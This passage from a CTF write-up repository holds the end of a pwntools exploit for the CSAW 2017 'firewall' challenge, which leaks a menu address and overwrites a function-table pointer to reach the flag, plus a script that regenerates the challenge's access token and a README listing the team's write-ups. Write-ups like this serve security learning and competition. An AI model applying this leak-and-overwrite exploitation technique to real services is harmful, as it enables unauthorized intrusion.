43 | r = remote("firewall.chal.csaw.io", 4141)
44 | #r = remote("192.168.21.102", 8888)
45 | r.sendlineafter("TOKEN: ", "352762356")
46 | 
47 | # Create first rule
48 | r.sendlineafter("SELECTION: ", "1")
49 | r.sendlineafter("NAME: ", "A")
50 | r.sendlineafter("PORT: ", "40")
51 | r.sendlineafter("TYPE: ", "TCP")
52 | r.sendline("")
53 | 
54 | # leak address of menu
55 | r.sendlineafter("SELECTION: ", "4")
56 | r.sendlineafter("PRINT: ", "0")
57 | r.sendline("")
58 | 
59 | leak = r.recvuntil("TO MENU")
60 | print hexdump(leak)
61 | 
62 | l = u32(leak[0x29:0x29+4])
63 | flag_loc = l + 0x39c9
64 | print "menu_located at:", hex(l)
65 | 
66 | # overwrite one of menu table addr
67 | r.sendlineafter("SELECTION: ", "2")
68 | r.sendlineafter("EDIT: ", "0")
69 | 
70 | #raw_input("$ ")
71 | 
72 | r.sendlineafter("NAME: ", p32(l)[1:] + p32(flag_loc))
73 | r.sendlineafter("PORT: ", "0")
74 | r.sendlineafter("TYPE: ", "")
75 | 
76 | r.sendline("")
77 | 
78 | r.interactive()
79 | r.close()
80 | 


--------------------------------------------------------------------------------
/2017-CSAW/firewall/token.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | ss = None
 4 | 
 5 | def srand(val):
 6 |     global ss
 7 |     ss = val
 8 | 
 9 | def rand():
10 |     global ss
11 |     if ss is None:
12 |         ss = 123459876
13 |     v1 = (16807 * (ss % 0x1F31D) - 2836 * (ss / 0x1F31D))
14 |     ss = v1 + (-(v1 < 0) & 0x7FFFFFFF)
15 |     return ss % 0x80000000
16 | 
17 | def gen_token():
18 |     srand(0x6D6F6F64)
19 |     token = 0x45544e49
20 |     for i in range(0x100):
21 |         token += rand()
22 |         token &= 0xFFFFFFFF
23 |     return token
24 | 
25 | print "token:", gen_token()
26 | 


--------------------------------------------------------------------------------
/CNAME:
--------------------------------------------------------------------------------
1 | hack.toomany.systems


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # irGeeks writeups
 2 | 
 3 | * [**Boston Key Party 2017**](2017-BostonKeyParty/memo)
 4 | 
 5 | * [**CodeGate 2017**](2016-CodeGate)
 6 | 
 7 | * [**SharifCTF7 2016**](2016-SharifCTF7)
 8 | 
 9 | * [**ASIS CTF Finals 2017**](2017-ASIS-CTF-Finals/GSA%20Main%20Server)
10 | 
11 | * [**CSAW 2017**](2017-CSAW/firewall)
12 | 


--------------------------------------------------------------------------------